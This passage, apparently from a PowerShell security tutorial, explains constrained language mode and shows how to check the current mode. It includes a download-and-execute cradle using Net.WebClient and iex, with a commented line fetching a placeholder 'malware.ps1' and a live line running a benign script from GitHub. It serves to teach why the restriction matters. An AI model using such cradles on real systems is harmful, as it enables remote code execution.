Constrained language mode
There are specific language modes available, and one of these is constrained language mode. In this specific mode, only the PowerShell core functionality will be working and the following possibilities will be prevented:
- Using .NET methods directly
- Using Win32 APIs
- Using COM objects
This example script shows the currently used language mode, which is FullLanguageMode
:
#current language mode
$ExecutionContext.SessionState.LanguageMode
In this language mode, it is possible to use the web client from the .NET Framework to download and execute code dynamically:
#Using TLS 1.2 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 #(New ObjectNet.WebClient).DownloadString(‘https://[website]/malware.ps1′) #example with $PSVersionTable iex ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1'))
The retrieved code will display the $PSVersionTable
variable. Now, we...